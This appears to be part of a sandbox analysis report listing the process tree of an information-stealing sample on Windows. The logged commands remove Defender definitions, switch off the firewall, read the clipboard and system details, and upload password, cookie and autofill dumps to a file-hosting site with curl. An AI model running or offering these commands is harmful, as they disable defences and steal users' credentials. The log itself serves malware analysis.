        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:6744
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:6404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:9616
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:13784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:11384
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:14236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:14508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:6412
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:8952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:10080
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:14852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:10872
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:12624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        10⤵
        
        PID:13016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        10⤵
        
        PID:13036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        10⤵
        
        PID:15016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        8⤵
        
        PID:5188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        8⤵
        
        PID:5584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "netsh advfirewall set allprofiles state off"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        8⤵
        
        PID:6296
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        9⤵
        
        PID:5088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2> nul
        8⤵
        
        PID:9392
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
        9⤵
        
        PID:13968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
        8⤵
        
        PID:11484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
        9⤵
        
        PID:16412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Get-Clipboard -TextFormatType Text"
        8⤵
        Clipboard Data
        
        PID:11508
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get csname, description, installdate, organization, registereduser, numberofprocesses
        8⤵
        
        PID:11744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
        8⤵
        
        PID:12068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wppassw.txt" https://store4.gofile.io/uploadFile"
        8⤵
        
        PID:14788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcook.txt" https://store4.gofile.io/uploadFile"
        8⤵
        
        PID:15160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpautofill.txt" https://store4.gofile.io/uploadFile"
        8⤵
        
        PID:15180
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        6⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        7⤵
        
        PID:2728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:3956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:6084
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:6012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:5552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:1888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:4924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:6944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:7532
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:11200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:6760
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:11964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:8604
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        12⤵
        
        PID:17320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        12⤵
        
        PID:17400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:6228
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:7792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:9724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:10752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:10584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:9200
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:13856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        10⤵
        
        PID:12892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        10⤵
        
        PID:13296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        10⤵
        
        PID:14560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:5216
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:6104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:2372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:228
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:6340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:7000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:6620
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:8916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:9660
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:14428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:8940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:14400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:7504
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:8440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:9268
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:14256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:11672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        10⤵
        
        PID:8564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        10⤵
        
        PID:10388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        10⤵
        
        PID:15772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:5288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:6628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:8184
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:11884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:8624
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:13060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:12888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:16896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:8060
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:11568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        8⤵
        
        PID:8844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        8⤵
        
        PID:8812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "netsh advfirewall set allprofiles state off"
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:15356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        8⤵
        
        PID:11732
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        9⤵
        
        PID:16460
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        6⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        7⤵
        
        PID:5988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:5332
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:1592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:1552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:6604
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:7152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:2320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:7568
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:8272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:11924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:11476
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:8504
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:9116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:14936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:15744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:6636
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:11980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:4892
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:13656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:11596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        10⤵
        
        PID:15708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        10⤵
        
        PID:2784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:5712
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:7848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:7428
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:10600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:3824
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:14228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        8⤵
        
        PID:12864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        8⤵
        
        PID:12900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        8⤵
        
        PID:14532
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        6⤵
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        7⤵
        
        PID:5724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:5740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:4744
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:3976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:6772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:6880
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:10288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:9284
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:13744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:3992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:6988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:9280
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:14820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:11840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:10072
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:12036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:11680
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:16440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        8⤵
        
        PID:14420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        8⤵
        
        PID:14488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        8⤵
        
        PID:14736
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        6⤵
        
        PID:5660
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        6⤵
        
        PID:3496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "netsh advfirewall set allprofiles state off"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7688
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        6⤵
        
        PID:6308
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        7⤵
        
        PID:6472
      - C:\Windows\system32\cmd.exe
        
